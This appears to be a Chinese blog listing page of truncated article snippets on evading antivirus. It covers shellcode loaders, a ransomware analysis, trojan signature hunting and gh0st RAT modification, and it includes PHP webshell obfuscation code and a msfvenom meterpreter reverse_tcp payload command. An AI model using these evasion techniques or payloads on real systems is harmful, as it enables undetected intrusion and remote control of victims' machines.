背景 今天在复习《加密与解密》时,在软件保护这一章中有一个代码与数据结合
转载 2022-12-12 21:01:42
729阅读
测试-专题KaliLinux——shellcode-payload分离反安全软件 anti-virus security software都是特别针对PE头文件的查杀当payload文件越
原创 2022-04-29 21:48:26
318阅读
近日,fortinet截获一种使用python语言编写的勒索软件,并将其命名为 “Fsociety Locker”。之所以命名为“Fsociety Locker”,是因为勒索软件作者是美剧“黑客军团”的粉丝,勒索软件作者使用了“fs0ciety”作为文件加密后的后缀名。 今天我们就对这款勒索软件进行分析。行为特征在win7系统上运行的效果为:1.png (33.05 KB, 下载次数: 99)20
QQ 1285575001Wechat M010527技术交流 QQ群599020441纪年科技aming反病毒安全软件 anti-virus security software三种特点基于特征基于行为基于云查杀 -特征查杀都是特别针对PE头文件的查杀当payload文件越大的时候,特征越容易查杀反制查杀机制 (概括)采取特征与行为分离避免 PE头文...
原创 2021-07-18 20:40:47
1129阅读
这篇文章陆续更新统计收集经过测试的一些知识东拼西凑还是可以免的主要还是一些思路和知识点
原创 11月前
38阅读
0x01 前言2019年,...
原创 2023-07-27 22:28:31
0阅读
msf 生成 shellcode 利用 python 加载 前言 网上有很多教程,但是可能教程中的payload 放到本地就是没有办法跑起来 例如这种报错就是shellcodeloader的问题 # 商业转载请联系作者获得授权,非商业转载请注明出处。 # For commercial use, ...
转载 2021-08-04 11:10:00
1921阅读
1点赞
复现自:https://forum.90sec.com/t/topic/1587(原文有部分代码有误且描述并不是很清楚,因此复现后进行记录并以备后续及他人使用) 0x00 原理:(别的文章看来的) shellcode和加载器(pyminifier混淆后)经base64编码后,放远程服务器备用。 然后 ...
转载 2021-07-15 10:59:00
1606阅读
2评论
一: 灰鸽子方法大全 在所有的版本中,黑防的鸽子算是比较好做的了,今天在这里,我就用他做案例 一,最经典的OD一半一半定位法 我们把整个黑色标记的区域看成是没有修改的木马代码把它从中间切平均分成两半,把其中的一半用nop 填充掉,再用瑞星内存,如果杀掉了就说明特征代码在我们没有nop 掉的一半,没有到就说明我们刚刚nop的一半中含有特征代码。 所演示的情况是特征代码在没有no
转载 精选 2009-07-15 21:36:01
7811阅读
这个绝对原创! + 首发!个人认为大致分为这几个方面:1.关键字拆分。 比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。2.可变变量、引用、可变函数。 可变变量 比如$a=$_POST['x'];$b='a';@eval($$b); 引用 比如$a=$_POST['x'
转载 2016-08-01 17:41:00
123阅读
2评论
 首先,我们准备工具:“ASProtect SKE 2.3 Beta” “Iexpress捆绑”“KaOs undetecter” “MaskPE 2.0最终版”;        教程开始:         第一步:    &nbs
转载 2009-12-11 20:22:54
1569阅读
2评论
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会/x/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2022-02-28 11:07:56
351阅读
测试
转载 2012-02-14 07:30:59
335阅读
       远控软件gh0st源码2010-12-13 14:57远控软件gh0st3.6开源了,开源意味 着我们可以在此基础上进行二次开发,同时也意味着软可以较容易的查杀该款 远控木马,既然要利用,我们就做好源码基础上的木马工作。 好久没有来博客了,我把这部分整理了一下,先抛一砖头,有兴趣的朋友可 以接着做,也可以和
原创 2011-12-21 06:58:39
5209阅读
1点赞
这个绝对原创! + 首发!个人认为大致分为这几个方面:1.关键字拆分。 比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。2.可变变量、引用、可变函数。 可变变量 比如$a=$_POST['x'];$b='a';@eval($$b); 引用 比如$a=$_POST['x'
转载 2018-11-17 15:53:00
174阅读
2评论
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会把它干死不过,在电脑上装了360安全卫士的情况下,defender会被抑制,我们的后门就可以正常运行了先使用msfvenom生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2021-06-29 11:08:00
1088阅读
干货|-C加载器尝试哆啦安全|知识星球上线啦(优惠券活动即将到期)!!!微信公众号
原创 2021-12-14 09:21:43
933阅读
通过代码直接调用System.Management,替代powershell.exe c#代码,保存为1.cs: using System.Collections.ObjectModel; using System.Management.Automation; using System.Manage ...
转载 2021-07-17 23:39:00
1712阅读
2评论
(一)、应注意的事项:  1.的测试(在线杀毒、杀毒软件上报、世界反毒网:http://www.virustotal.com/zh-cn/) 在这里我建议大家不要上传自己的马到这样的网站上去.一上传不要多久就会被杀了.大家还是把软装在自己的电脑,然后测试比较好.  2.一个好的杀木马要过文件、内存、行为、主动防御等一些专杀软件.  3.目前一些常用的软有
原创 2009-07-25 22:12:58
2366阅读
2评论
一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。 2.内存的和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入, 一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:
转载 2010-02-13 02:48:28
731阅读
  • 1
  • 2
  • 3
  • 4
  • 5